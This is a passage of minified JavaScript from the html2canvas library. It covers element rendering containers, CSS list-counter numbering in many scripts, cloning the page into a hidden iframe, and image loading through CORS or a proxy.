je.canvas=_e,je.intrinsicWidth=_e.width,je.intrinsicHeight=_e.height,je}return de(ce,fe),ce}(pl),rh=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this,tt=new XMLSerializer,dt=Q(ge,_e);return _e.setAttribute("width",dt.width+"px"),_e.setAttribute("height",dt.height+"px"),je.svg="data:image/svg+xml,"+encodeURIComponent(tt.serializeToString(_e)),je.intrinsicWidth=_e.width.baseVal.value,je.intrinsicHeight=_e.height.baseVal.value,je.context.cache.addImage(je.svg),je}return de(ce,fe),ce}(pl),ud=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this;return je.value=_e.value,je}return de(ce,fe),ce}(pl),Zm=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this;return je.start=_e.start,je.reversed="boolean"==typeof _e.reversed&&!0===_e.reversed,je}return de(ce,fe),ce}(pl),N_=[{type:15,flags:0,unit:"px",number:3}],L_=[{type:16,flags:0,number:50}],sh="checkbox",ps="radio",ch="password",yl=707406591,z_=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this;switch(je.type=_e.type.toLowerCase(),je.checked=_e.checked,je.value=function(fe){var ce=fe.type===ch?new Array(fe.value.length+1).join("\u2022"):fe.value;return 0===ce.length?fe.placeholder||"":ce}(_e),(je.type===sh||je.type===ps)&&(je.styles.backgroundColor=3739148031,je.styles.borderTopColor=je.styles.borderRightColor=je.styles.borderBottomColor=je.styles.borderLeftColor=2779096575,je.styles.borderTopWidth=je.styles.borderRightWidth=je.styles.borderBottomWidth=je.styles.borderLeftWidth=1,je.styles.borderTopStyle=je.styles.borderRightStyle=je.styles.borderBottomStyle=je.styles.borderLeftStyle=1,je.styles.backgroundClip=[0],je.styles.backgroundOrigin=[0],je.bounds=function(fe){return fe.width>fe.height?new I(fe.left+(fe.width-fe.height)/2,fe.top,fe.height,fe.height):fe.width<fe.height?new I(fe.left,fe.top+(fe.height-fe.width)/2,fe.width,fe.width):fe}(je.bounds)),je.type){case sh:je.styles.borderTopRightRadius=je.styles.borderTopLeftRadius=je.styles.borderBottomRightRadius=je.styles.borderBottomLeftRadius=N_;break;case ps:je.styles.borderTopRightRadius=je.styles.borderTopLeftRadius=je.styles.borderBottomRightRadius=je.styles.borderBottomLeftRadius=L_}return je}return de(ce,fe),ce}(pl),hd=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this,tt=_e.options[_e.selectedIndex||0];return je.value=tt&&tt.text||"",je}return de(ce,fe),ce}(pl),N0=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this;return je.value=_e.value,je}return de(ce,fe),ce}(pl),lh=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this;je.src=_e.src,je.width=parseInt(_e.width,10)||0,je.height=parseInt(_e.height,10)||0,je.backgroundColor=je.styles.backgroundColor;try{if(_e.contentWindow&&_e.contentWindow.document&&_e.contentWindow.document.documentElement){je.tree=Ce(ge,_e.contentWindow.document.documentElement);var tt=_e.contentWindow.document.documentElement?uo(ge,getComputedStyle(_e.contentWindow.document.documentElement).backgroundColor):Oc.TRANSPARENT,dt=_e.contentWindow.document.body?uo(ge,getComputedStyle(_e.contentWindow.document.body).backgroundColor):Oc.TRANSPARENT;je.backgroundColor=Pc(tt)?Pc(dt)?je.styles.backgroundColor:dt:tt}}catch(_t){}return je}return de(ce,fe),ce}(pl),bC=["OL","UL","MENU"],tr=function(fe,ce,ge,_e){for(var je=ce.firstChild,tt=void 0;je;je=tt)if(tt=je.nextSibling,di(je)&&je.data.trim().length>0)ge.textNodes.push(new oh(fe,je,ge.styles));else if(pi(je))if(W_(je)&&je.assignedNodes)je.assignedNodes().forEach(function(_t){return tr(fe,_t,ge,_e)});else{var dt=Se(fe,je);dt.styles.isVisible()&&(nt(je,dt,_e)?dt.flags|=4:Dt(dt.styles)&&(dt.flags|=2),-1!==bC.indexOf(je.tagName)&&(dt.flags|=8),ge.elements.push(dt),je.shadowRoot?tr(fe,je.shadowRoot,dt,_e):!dh(je)&&!Ao(je)&&!mh(je)&&tr(fe,je,dt,_e))}},Se=function(fe,ce){return gc(ce)?new zc(fe,ce):Wc(ce)?new O_(fe,ce):Ao(ce)?new rh(fe,ce):Ya(ce)?new ud(fe,ce):ca(ce)?new Zm(fe,ce):ka(ce)?new z_(fe,ce):mh(ce)?new hd(fe,ce):dh(ce)?new N0(fe,ce):Po(ce)?new lh(fe,ce):new pl(fe,ce)},Ce=function(fe,ce){var ge=Se(fe,ce);return ge.flags|=4,tr(fe,ce,ge,ge),ge},nt=function(fe,ce,ge){return ce.styles.isPositionedWithZIndex()||ce.styles.opacity<1||ce.styles.isTransformed()||rr(fe)&&ge.styles.isTransparent()},Dt=function(fe){return fe.isPositioned()||fe.isFloating()},di=function(fe){return fe.nodeType===Node.TEXT_NODE},pi=function(fe){return fe.nodeType===Node.ELEMENT_NODE},Hi=function(fe){return pi(fe)&&void 0!==fe.style&&!pa(fe)},pa=function(fe){return"object"==typeof fe.className},Ya=function(fe){return"LI"===fe.tagName},ca=function(fe){return"OL"===fe.tagName},ka=function(fe){return"INPUT"===fe.tagName},Ao=function(fe){return"svg"===fe.tagName},rr=function(fe){return"BODY"===fe.tagName},Wc=function(fe){return"CANVAS"===fe.tagName},At=function(fe){return"VIDEO"===fe.tagName},gc=function(fe){return"IMG"===fe.tagName},Po=function(fe){return"IFRAME"===fe.tagName},Bf=function(fe){return"STYLE"===fe.tagName},dh=function(fe){return"TEXTAREA"===fe.tagName},mh=function(fe){return"SELECT"===fe.tagName},W_=function(fe){return"SLOT"===fe.tagName},uh=function(fe){return fe.tagName.indexOf("-")>0},Cc=function(){function fe(){this.counters={}}return fe.prototype.getCounterValue=function(ce){var ge=this.counters[ce];return ge&&ge.length?ge[ge.length-1]:1},fe.prototype.getCounterValues=function(ce){return this.counters[ce]||[]},fe.prototype.pop=function(ce){var ge=this;ce.forEach(function(_e){return ge.counters[_e].pop()})},fe.prototype.parse=function(ce){var ge=this,_e=ce.counterIncrement,je=ce.counterReset,tt=!0;null!==_e&&_e.forEach(function(_t){var gt=ge.counters[_t.counter];gt&&0!==_t.increment&&(tt=!1,gt.length||gt.push(1),gt[Math.max(0,gt.length-1)]+=_t.increment)});var dt=[];return tt&&je.forEach(function(_t){var gt=ge.counters[_t.counter];dt.push(_t.counter),gt||(gt=ge.counters[_t.counter]=[]),gt.push(_t.reset)}),dt},fe}(),MC={integers:[1e3,900,500,400,100,90,50,40,10,9,5,4,1],values:["M","CM","D","CD","C","XC","L","XL","X","IX","V","IV","I"]},Fc={integers:[9e3,8e3,7e3,6e3,5e3,4e3,3e3,2e3,1e3,900,800,700,600,500,400,300,200,100,90,80,70,60,50,40,30,20,10,9,8,7,6,5,4,3,2,1],values:["\u0554","\u0553","\u0552","\u0551","\u0550","\u054f","\u054e","\u054d","\u054c","\u054b","\u054a","\u0549","\u0548","\u0547","\u0546","\u0545","\u0544","\u0543","\u0542","\u0541","\u0540","\u053f","\u053e","\u053d","\u053c","\u053b","\u053a","\u0539","\u0538","\u0537","\u0536","\u0535","\u0534","\u0533","\u0532","\u0531"]},eE={integers:[1e4,9e3,8e3,7e3,6e3,5e3,4e3,3e3,2e3,1e3,400,300,200,100,90,80,70,60,50,40,30,20,19,18,17,16,15,10,9,8,7,6,5,4,3,2,1],values:["\u05d9\u05f3","\u05d8\u05f3","\u05d7\u05f3","\u05d6\u05f3","\u05d5\u05f3","\u05d4\u05f3","\u05d3\u05f3","\u05d2\u05f3","\u05d1\u05f3","\u05d0\u05f3","\u05ea","\u05e9","\u05e8","\u05e7","\u05e6","\u05e4","\u05e2","\u05e1","\u05e0","\u05de","\u05dc","\u05db","\u05d9\u05d8","\u05d9\u05d7","\u05d9\u05d6","\u05d8\u05d6","\u05d8\u05d5","\u05d9","\u05d8","\u05d7","\u05d6","\u05d5","\u05d4","\u05d3","\u05d2","\u05d1","\u05d0"]},UM={integers:[1e4,9e3,8e3,7e3,6e3,5e3,4e3,3e3,2e3,1e3,900,800,700,600,500,400,300,200,100,90,80,70,60,50,40,30,20,10,9,8,7,6,5,4,3,2,1],values:["\u10f5","\u10f0","\u10ef","\u10f4","\u10ee","\u10ed","\u10ec","\u10eb","\u10ea","\u10e9","\u10e8","\u10e7","\u10e6","\u10e5","\u10e4","\u10f3","\u10e2","\u10e1","\u10e0","\u10df","\u10de","\u10dd","\u10f2","\u10dc","\u10db","\u10da","\u10d9","\u10d8","\u10d7","\u10f1","\u10d6","\u10d5","\u10d4","\u10d3","\u10d2","\u10d1","\u10d0"]},fd=function(fe,ce,ge,_e,je,tt){return fe<ce||fe>ge?B_(fe,je,tt.length>0):_e.integers.reduce(function(dt,_t,gt){for(;fe>=_t;)fe-=_t,dt+=_e.values[gt];return dt},"")+tt},F_=function(fe,ce,ge,_e){var je="";do{ge||fe--,je=_e(fe)+je,fe/=ce}while(fe*ce>=ce);return je},xr=function(fe,ce,ge,_e,je){var tt=ge-ce+1;return(fe<0?"-":"")+(F_(Math.abs(fe),tt,_e,function(dt){return g(Math.floor(dt%tt)+ce)})+je)},hh=function(fe,ce,ge){void 0===ge&&(ge=". ");var _e=ce.length;return F_(Math.abs(fe),_e,!1,function(je){return ce[Math.floor(je%_e)]})+ge},tu=function(fe,ce,ge,_e,je,tt){if(fe<-9999||fe>9999)return B_(fe,4,je.length>0);var dt=Math.abs(fe),_t=je;if(0===dt)return ce[0]+_t;for(var gt=0;dt>0&&gt<=4;gt++){var kt=dt%10;0===kt&&Tr(tt,1)&&""!==_t?_t=ce[kt]+_t:kt>1||1===kt&&0===gt||1===kt&&1===gt&&Tr(tt,2)||1===kt&&1===gt&&Tr(tt,4)&&fe>100||1===kt&&gt>1&&Tr(tt,8)?_t=ce[kt]+(gt>0?ge[gt-1]:"")+_t:1===kt&&gt>0&&(_t=ge[gt-1]+_t),dt=Math.floor(dt/10)}return(fe<0?_e:"")+_t},AC="\ub9c8\uc774\ub108\uc2a4",B_=function(fe,ce,ge){var _e=ge?". ":"",je=ge?"\u3001":"",tt=ge?", ":"",dt=ge?" ":"";switch(ce){case 0:return"\u2022"+dt;case 1:return"\u25e6"+dt;case 2:return"\u25fe"+dt;case 5:var _t=xr(fe,48,57,!0,_e);return _t.length<4?"0"+_t:_t;case 4:return hh(fe,"\u3007\u4e00\u4e8c\u4e09\u56db\u4e94\u516d\u4e03\u516b\u4e5d",je);case 6:return fd(fe,1,3999,MC,3,_e).toLowerCase();case 7:return fd(fe,1,3999,MC,3,_e);case 8:return xr(fe,945,969,!1,_e);case 9:return xr(fe,97,122,!1,_e);case 10:return xr(fe,65,90,!1,_e);case 11:return xr(fe,1632,1641,!0,_e);case 12:case 49:return fd(fe,1,9999,Fc,3,_e);case 35:return fd(fe,1,9999,Fc,3,_e).toLowerCase();case 13:return xr(fe,2534,2543,!0,_e);case 14:case 30:return xr(fe,6112,6121,!0,_e);case 15:return hh(fe,"\u5b50\u4e11\u5bc5\u536f\u8fb0\u5df3\u5348\u672a\u7533\u9149\u620c\u4ea5",je);case 16:return hh(fe,"\u7532\u4e59\u4e19\u4e01\u620a\u5df1\u5e9a\u8f9b\u58ec\u7678",je);case 17:case 48:return tu(fe,"\u96f6\u4e00\u4e8c\u4e09\u56db\u4e94\u516d\u4e03\u516b\u4e5d","\u5341\u767e\u5343\u842c","\u8ca0",je,14);case 47:return tu(fe,"\u96f6\u58f9\u8cb3\u53c3\u8086\u4f0d\u9678\u67d2\u634c\u7396","\u62fe\u4f70\u4edf\u842c","\u8ca0",je,15);case 42:return tu(fe,"\u96f6\u4e00\u4e8c\u4e09\u56db\u4e94\u516d\u4e03\u516b\u4e5d","\u5341\u767e\u5343\u842c","\u8d1f",je,14);case 41:return tu(fe,"\u96f6\u58f9\u8d30\u53c1\u8086\u4f0d\u9646\u67d2\u634c\u7396","\u62fe\u4f70\u4edf\u842c","\u8d1f",je,15);case 26:return tu(fe,"\u3007\u4e00\u4e8c\u4e09\u56db\u4e94\u516d\u4e03\u516b\u4e5d","\u5341\u767e\u5343\u4e07","\u30de\u30a4\u30ca\u30b9",je,0);case 25:return tu(fe,"\u96f6\u58f1\u5f10\u53c2\u56db\u4f0d\u516d\u4e03\u516b\u4e5d","\u62fe\u767e\u5343\u4e07","\u30de\u30a4\u30ca\u30b9",je,7);case 31:return tu(fe,"\uc601\uc77c\uc774\uc0bc\uc0ac\uc624\uc721\uce60\ud314\uad6c","\uc2ed\ubc31\ucc9c\ub9cc",AC,tt,7);case 33:return tu(fe,"\u96f6\u4e00\u4e8c\u4e09\u56db\u4e94\u516d\u4e03\u516b\u4e5d","\u5341\u767e\u5343\u842c",AC,tt,0);case 32:return tu(fe,"\u96f6\u58f9\u8cb3\u53c3\u56db\u4e94\u516d\u4e03\u516b\u4e5d","\u62fe\u767e\u5343",AC,tt,7);case 18:return xr(fe,2406,2415,!0,_e);case 20:return fd(fe,1,19999,UM,3,_e);case 21:return xr(fe,2790,2799,!0,_e);case 22:return xr(fe,2662,2671,!0,_e);case 22:return fd(fe,1,10999,eE,3,_e);case 23:return hh(fe,"\u3042\u3044\u3046\u3048\u304a\u304b\u304d\u304f\u3051\u3053\u3055\u3057\u3059\u305b\u305d\u305f\u3061\u3064\u3066\u3068\u306a\u306b\u306c\u306d\u306e\u306f\u3072\u3075\u3078\u307b\u307e\u307f\u3080\u3081\u3082\u3084\u3086\u3088\u3089\u308a\u308b\u308c\u308d\u308f\u3090\u3091\u3092\u3093");case 24:return hh(fe,"\u3044\u308d\u306f\u306b\u307b\u3078\u3068\u3061\u308a\u306c\u308b\u3092\u308f\u304b\u3088\u305f\u308c\u305d\u3064\u306d\u306a\u3089\u3080\u3046\u3090\u306e\u304a\u304f\u3084\u307e\u3051\u3075\u3053\u3048\u3066\u3042\u3055\u304d\u3086\u3081\u307f\u3057\u3091\u3072\u3082\u305b\u3059");case 27:return xr(fe,3302,3311,!0,_e);case 28:return hh(fe,"\u30a2\u30a4\u30a6\u30a8\u30aa\u30ab\u30ad\u30af\u30b1\u30b3\u30b5\u30b7\u30b9\u30bb\u30bd\u30bf\u30c1\u30c4\u30c6\u30c8\u30ca\u30cb\u30cc\u30cd\u30ce\u30cf\u30d2\u30d5\u30d8\u30db\u30de\u30df\u30e0\u30e1\u30e2\u30e4\u30e6\u30e8\u30e9\u30ea\u30eb\u30ec\u30ed\u30ef\u30f0\u30f1\u30f2\u30f3",je);case 29:return hh(fe,"\u30a4\u30ed\u30cf\u30cb\u30db\u30d8\u30c8\u30c1\u30ea\u30cc\u30eb\u30f2\u30ef\u30ab\u30e8\u30bf\u30ec\u30bd\u30c4\u30cd\u30ca\u30e9\u30e0\u30a6\u30f0\u30ce\u30aa\u30af\u30e4\u30de\u30b1\u30d5\u30b3\u30a8\u30c6\u30a2\u30b5\u30ad\u30e6\u30e1\u30df\u30b7\u30f1\u30d2\u30e2\u30bb\u30b9",je);case 34:return xr(fe,3792,3801,!0,_e);case 37:return xr(fe,6160,6169,!0,_e);case 38:return xr(fe,4160,4169,!0,_e);case 39:return xr(fe,2918,2927,!0,_e);case 40:return xr(fe,1776,1785,!0,_e);case 43:return xr(fe,3046,3055,!0,_e);case 44:return xr(fe,3174,3183,!0,_e);case 45:return xr(fe,3664,3673,!0,_e);case 46:return xr(fe,3872,3881,!0,_e);default:return xr(fe,48,57,!0,_e)}},GM="data-html2canvas-ignore",H_=function(){function fe(ce,ge,_e){if(this.context=ce,this.options=_e,this.scrolledElements=[],this.referenceElement=ge,this.counters=new Cc,this.quoteDepth=0,!ge.ownerDocument)throw new Error("Cloned element does not have an owner document");this.documentElement=this.cloneNode(ge.ownerDocument.documentElement,!1)}return fe.prototype.toIFrame=function(ce,ge){var _e=this,je=iE(ce,ge);if(!je.contentWindow)return Promise.reject("Unable to find iframe window");var tt=ce.defaultView.pageXOffset,dt=ce.defaultView.pageYOffset,_t=je.contentWindow,gt=_t.document,kt=QM(je).then(function(){return j(_e,void 0,void 0,function(){var Lt,Ht;return $(this,function(ui){switch(ui.label){case 0:return this.scrolledElements.forEach(L0),_t&&(_t.scrollTo(ge.left,ge.top),/(iPad|iPhone|iPod)/g.test(navigator.userAgent)&&(_t.scrollY!==ge.top||_t.scrollX!==ge.left)&&(this.context.logger.warn("Unable to restore scroll position for cloned document"),this.context.windowBounds=this.context.windowBounds.add(_t.scrollX-ge.left,_t.scrollY-ge.top,0,0))),Lt=this.options.onclone,void 0===(Ht=this.clonedReferenceElement)?[2,Promise.reject("Error finding the "+this.referenceElement.nodeName+" in the cloned document")]:gt.fonts&&gt.fonts.ready?[4,gt.fonts.ready]:[3,2];case 1:ui.sent(),ui.label=2;case 2:return/(AppleWebKit)/g.test(navigator.userAgent)?[4,z7(gt)]:[3,4];case 3:ui.sent(),ui.label=4;case 4:return"function"==typeof Lt?[2,Promise.resolve().then(function(){return Lt(gt,Ht)}).then(function(){return je})]:[2,je]}})})});return gt.open(),gt.write(aE(document.doctype)+"<html></html>"),$M(this.referenceElement.ownerDocument,tt,dt),gt.replaceChild(gt.adoptNode(this.documentElement),gt.documentElement),gt.close(),kt},fe.prototype.createElementClone=function(ce){if(Nf(ce,2),Wc(ce))return this.createCanvasClone(ce);if(At(ce))return this.createVideoClone(ce);if(Bf(ce))return this.createStyleClone(ce);var ge=ce.cloneNode(!1);return gc(ge)&&(gc(ce)&&ce.currentSrc&&ce.currentSrc!==ce.src&&(ge.src=ce.currentSrc,ge.srcset=""),"lazy"===ge.loading&&(ge.loading="eager")),uh(ge)?this.createCustomElementClone(ge):ge},fe.prototype.createCustomElementClone=function(ce){var ge=document.createElement("html2canvascustomelement");return U_(ce.style,ge),ge},fe.prototype.createStyleClone=function(ce){try{var ge=ce.sheet;if(ge&&ge.cssRules){var _e=[].slice.call(ge.cssRules,0).reduce(function(tt,dt){return dt&&"string"==typeof dt.cssText?tt+dt.cssText:tt},""),je=ce.cloneNode(!1);return je.textContent=_e,je}}catch(tt){if(this.context.logger.error("Unable to access cssRules property",tt),"SecurityError"!==tt.name)throw tt}return ce.cloneNode(!1)},fe.prototype.createCanvasClone=function(ce){var ge;if(this.options.inlineImages&&ce.ownerDocument){var _e=ce.ownerDocument.createElement("img");try{return _e.src=ce.toDataURL(),_e}catch(kt){this.context.logger.info("Unable to inline canvas contents, canvas is tainted",ce)}}var je=ce.cloneNode(!1);try{je.width=ce.width,je.height=ce.height;var tt=ce.getContext("2d"),dt=je.getContext("2d");if(dt)if(!this.options.allowTaint&&tt)dt.putImageData(tt.getImageData(0,0,ce.width,ce.height),0,0);else{var _t=null!==(ge=ce.getContext("webgl2"))&&void 0!==ge?ge:ce.getContext("webgl");if(_t){var gt=_t.getContextAttributes();!1===(null==gt?void 0:gt.preserveDrawingBuffer)&&this.context.logger.warn("Unable to clone WebGL context as it has preserveDrawingBuffer=false",ce)}dt.drawImage(ce,0,0)}return je}catch(kt){this.context.logger.info("Unable to clone canvas as it is tainted",ce)}return je},fe.prototype.createVideoClone=function(ce){var ge=ce.ownerDocument.createElement("canvas");ge.width=ce.offsetWidth,ge.height=ce.offsetHeight;var _e=ge.getContext("2d");try{return _e&&(_e.drawImage(ce,0,0,ge.width,ge.height),this.options.allowTaint||_e.getImageData(0,0,ge.width,ge.height)),ge}catch(tt){this.context.logger.info("Unable to clone video as it is tainted",ce)}var je=ce.ownerDocument.createElement("canvas");return je.width=ce.offsetWidth,je.height=ce.offsetHeight,je},fe.prototype.appendChildNode=function(ce,ge,_e){(!pi(ge)||!function(fe){return"SCRIPT"===fe.tagName}(ge)&&!ge.hasAttribute(GM)&&("function"!=typeof this.options.ignoreElements||!this.options.ignoreElements(ge)))&&(!this.options.copyStyles||!pi(ge)||!Bf(ge))&&ce.appendChild(this.cloneNode(ge,_e))},fe.prototype.cloneChildNodes=function(ce,ge,_e){for(var je=this,tt=ce.shadowRoot?ce.shadowRoot.firstChild:ce.firstChild;tt;tt=tt.nextSibling)if(pi(tt)&&W_(tt)&&"function"==typeof tt.assignedNodes){var dt=tt.assignedNodes();dt.length&&dt.forEach(function(_t){return je.appendChildNode(ge,_t,_e)})}else this.appendChildNode(ge,tt,_e)},fe.prototype.cloneNode=function(ce,ge){if(di(ce))return document.createTextNode(ce.data);if(!ce.ownerDocument)return ce.cloneNode(!1);var _e=ce.ownerDocument.defaultView;if(_e&&pi(ce)&&(Hi(ce)||pa(ce))){var je=this.createElementClone(ce);je.style.transitionProperty="none";var tt=_e.getComputedStyle(ce),dt=_e.getComputedStyle(ce,":before"),_t=_e.getComputedStyle(ce,":after");this.referenceElement===ce&&Hi(je)&&(this.clonedReferenceElement=je),rr(je)&&z0(je);var gt=this.counters.parse(new Ju(this.context,tt)),kt=this.resolvePseudoContent(ce,je,dt,fh.BEFORE);uh(ce)&&(ge=!0),At(ce)||this.cloneChildNodes(ce,je,ge),kt&&je.insertBefore(kt,je.firstChild);var Lt=this.resolvePseudoContent(ce,je,_t,fh.AFTER);return Lt&&je.appendChild(Lt),this.counters.pop(gt),(tt&&(this.options.copyStyles||pa(ce))&&!Po(ce)||ge)&&U_(tt,je),(0!==ce.scrollTop||0!==ce.scrollLeft)&&this.scrolledElements.push([je,ce.scrollLeft,ce.scrollTop]),(dh(ce)||mh(ce))&&(dh(je)||mh(je))&&(je.value=ce.value),je}return ce.cloneNode(!1)},fe.prototype.resolvePseudoContent=function(ce,ge,_e,je){var tt=this;if(_e){var dt=_e.content,_t=ge.ownerDocument;if(_t&&dt&&"none"!==dt&&"-moz-alt-content"!==dt&&"none"!==_e.display){this.counters.parse(new Ju(this.context,_e));var gt=new dC(this.context,_e),kt=_t.createElement("html2canvaspseudoelement");U_(_e,kt),gt.content.forEach(function(Ht){if(0===Ht.type)kt.appendChild(_t.createTextNode(Ht.value));else if(22===Ht.type){var ui=_t.createElement("img");ui.src=Ht.value,ui.style.opacity="1",kt.appendChild(ui)}else if(18===Ht.type){if("attr"===Ht.name){var Ki=Ht.values.filter(tn);Ki.length&&kt.appendChild(_t.createTextNode(ce.getAttribute(Ki[0].value)||""))}else if("counter"===Ht.name){var Ni=Ht.values.filter(Wl),dn=Ni[1];if((Ui=Ni[0])&&tn(Ui)){var ta=tt.counters.getCounterValue(Ui.value),na=dn&&tn(dn)?kf.parse(tt.context,dn.value):3;kt.appendChild(_t.createTextNode(B_(ta,na,!1)))}}else if("counters"===Ht.name){var Ui,To=Ht.values.filter(Wl),Mn=To[1];if(dn=To[2],(Ui=To[0])&&tn(Ui)){var qa=tt.counters.getCounterValues(Ui.value),Qi=dn&&tn(dn)?kf.parse(tt.context,dn.value):3,ro=Mn&&0===Mn.type?Mn.value:"",Yn=qa.map(function(Uc){return B_(Uc,Qi,!1)}).join(ro);kt.appendChild(_t.createTextNode(Yn))}}}else if(20===Ht.type)switch(Ht.value){case"open-quote":kt.appendChild(_t.createTextNode(or(gt.quotes,tt.quoteDepth++,!0)));break;case"close-quote":kt.appendChild(_t.createTextNode(or(gt.quotes,--tt.quoteDepth,!1)));break;default:kt.appendChild(_t.createTextNode(Ht.value))}}),kt.className=EC+" "+DC;var Lt=je===fh.BEFORE?" "+EC:" "+DC;return pa(ge)?ge.className.baseValue+=Lt:ge.className+=Lt,kt}}},fe.destroy=function(ce){return!!ce.parentNode&&(ce.parentNode.removeChild(ce),!0)},fe}(),fh=(()=>{return(fe=fh||(fh={}))[fe.BEFORE=0]="BEFORE",fe[fe.AFTER=1]="AFTER",fh;var fe})(),iE=function(fe,ce){var ge=fe.createElement("iframe");return ge.className="html2canvas-container",ge.style.visibility="hidden",ge.style.position="fixed",ge.style.left="-10000px",ge.style.top="0px",ge.style.border="0",ge.width=ce.width.toString(),ge.height=ce.height.toString(),ge.scrolling="no",ge.setAttribute(GM,"true"),fe.body.appendChild(ge),ge},jM=function(fe){return new Promise(function(ce){fe.complete?ce():fe.src?(fe.onload=ce,fe.onerror=ce):ce()})},z7=function(fe){return Promise.all([].slice.call(fe.images,0).map(jM))},QM=function(fe){return new Promise(function(ce,ge){var _e=fe.contentWindow;if(!_e)return ge("No window assigned for iframe");var je=_e.document;_e.onload=fe.onload=function(){_e.onload=fe.onload=null;var tt=setInterval(function(){je.body.childNodes.length>0&&"complete"===je.readyState&&(clearInterval(tt),ce(fe))},50)}})},W7=["all","d","content"],U_=function(fe,ce){for(var ge=fe.length-1;ge>=0;ge--){var _e=fe.item(ge);-1===W7.indexOf(_e)&&ce.style.setProperty(_e,fe.getPropertyValue(_e))}return ce},aE=function(fe){var ce="";return fe&&(ce+="<!DOCTYPE ",fe.name&&(ce+=fe.name),fe.internalSubset&&(ce+=fe.internalSubset),fe.publicId&&(ce+='"'+fe.publicId+'"'),fe.systemId&&(ce+='"'+fe.systemId+'"'),ce+=">"),ce},$M=function(fe,ce,ge){fe&&fe.defaultView&&(ce!==fe.defaultView.pageXOffset||ge!==fe.defaultView.pageYOffset)&&fe.defaultView.scrollTo(ce,ge)},L0=function(fe){var ce=fe[0],_e=fe[2];ce.scrollLeft=fe[1],ce.scrollTop=_e},EC="___html2canvas___pseudoelement_before",DC="___html2canvas___pseudoelement_after",nE='{\n    content: "" !important;\n    display: none !important;\n}',z0=function(fe){xC(fe,"."+EC+":before"+nE+"\n         ."+DC+":after"+nE)},xC=function(fe,ce){var ge=fe.ownerDocument;if(ge){var _e=ge.createElement("style");_e.textContent=ce,fe.appendChild(_e)}},wC=function(){function fe(){}return fe.getOrigin=function(ce){var ge=fe._link;return ge?(ge.href=ce,ge.href=ge.href,ge.protocol+ge.hostname+ge.port):"about:blank"},fe.isSameOrigin=function(ce){return fe.getOrigin(ce)===fe._origin},fe.setContext=function(ce){fe._link=ce.document.createElement("a"),fe._origin=fe.getOrigin(ce.location.href)},fe._origin="about:blank",fe}(),KM=function(){function fe(ce,ge){this.context=ce,this._options=ge,this._cache={}}return fe.prototype.addImage=function(ce){var ge=Promise.resolve();return this.has(ce)||(RC(ce)||rE(ce))&&(this._cache[ce]=this.loadImage(ce)).catch(function(){}),ge},fe.prototype.match=function(ce){return this._cache[ce]},fe.prototype.loadImage=function(ce){return j(this,void 0,void 0,function(){var ge,_e,je,tt,dt=this;return $(this,function(_t){switch(_t.label){case 0:return ge=wC.isSameOrigin(ce),_e=!IC(ce)&&!0===this._options.useCORS&&fs.SUPPORT_CORS_IMAGES&&!ge,je=!IC(ce)&&!ge&&!RC(ce)&&"string"==typeof this._options.proxy&&fs.SUPPORT_CORS_XHR&&!_e,ge||!1!==this._options.allowTaint||IC(ce)||RC(ce)||je||_e?(tt=ce,je?[4,this.proxy(tt)]:[3,2]):[2];case 1:tt=_t.sent(),_t.label=2;case 2:return this.context.logger.debug("Added image "+ce.substring(0,256)),[4,new Promise(function(gt,kt){var Lt=new Image;Lt.onload=function(){return gt(Lt)},Lt.onerror=kt,(sE(tt)||_e)&&(Lt.crossOrigin="anonymous"),Lt.src=tt,!0===Lt.complete&&setTimeout(function(){return gt(Lt)},500),dt._options.imageTimeout>0&&setTimeout(function(){return kt("Timed out ("+dt._options.imageTimeout+"ms) loading image")},dt._options.imageTimeout)})];case 3:return[2,_t.sent()]}})})},fe.prototype.has=function(ce){return void 0!==this._cache[ce]},fe.prototype.keys=function(){return Promise.resolve(Object.keys(this._cache))},fe.prototype.proxy=function(ce){var ge=this,_e=this._options.proxy;if(!_e)throw new Error("No proxy defined");var je=ce.substring(0,256);return new Promise(function(tt,dt){var _t=fs.SUPPORT_RESPONSE_TYPE?"blob":"text",gt=new XMLHttpRequest;gt.onload=function(){if(200===gt.status)if("text"===_t)tt(gt.response);else{var Ht=new FileReader;Ht.addEventListener("load",function(){return tt(Ht.result)},!1),Ht.addEventListener("error",function(ui){return dt(ui)},!1),Ht.readAsDataURL(gt.response)}else dt("Failed to proxy resource "+je+" with status code "+gt.status)},gt.onerror=dt;var kt=_e.indexOf("?")>-1?"&":"?";if(gt.open("GET",""+_e+kt+"url="+encodeURIComponent(ce)+"&responseType="+_t),"text"!==_t&&gt instanceof XMLHttpRequest&&(gt.responseType=_t),ge._options.imageTimeout){var Lt=ge._options.imageTimeout;gt.timeout=Lt,gt.ontimeout=function(){return dt("Timed out ("+Lt+"ms) proxying "+je)}}gt.send()})},fe}(),XM=/^data:image\/svg\+xml/i,ph=/^data:image\/.*;base64,/i,oE=/^data:image\/.*/i,rE=function(fe){return fs.SUPPORT_SVG_DRAWING||!Bc(fe)},IC=function(fe){return oE.test(fe)},sE=function(fe){return ph.test(fe)},RC=function(fe){return"blob"===fe.substr(0,4)},Bc=function(fe){return"svg"===fe.substr(-3).toLowerCase()||XM.test(fe)},Fi=function(){function fe(ce,ge){this.type=0,this.x=ce,this.y=ge}return fe.prototype.add=function(ce,ge){return new fe(this.x+ce,this.y+ge)},fe}(),qf=function(fe,ce,ge){return new Fi(fe.x+(ce.x-fe.x)*ge,fe.y+(ce.y-fe.y)*ge)},W0=function(){function fe(ce,ge,_e,je){this.type=1,this.start=ce,this.startControl=ge,this.endControl=_e,this.end=je}return fe.prototype.subdivide=function(ce,ge){var _e=qf(this.start,this.startControl,ce),je=qf(this.startControl,this.endControl,ce),tt=qf(this.endControl,this.end,ce),dt=qf(_e,je,ce),_t=qf(je,tt,ce),gt=qf(dt,_t,ce);return ge?new fe(this.start,_e,dt,gt):new fe(gt,_t,tt,this.end)},fe.prototype.add=function(ce,ge){return new fe(this.start.add(ce,ge),this.startControl.add(ce,ge),this.endControl.add(ce,ge),this.end.add(ce,ge))},fe.prototype.reverse=function(){return new fe(this.end,this.endControl,this.startControl,this.start)},fe}(),Ml=function(fe){return 1===fe.type},cE=function fe(ce){var 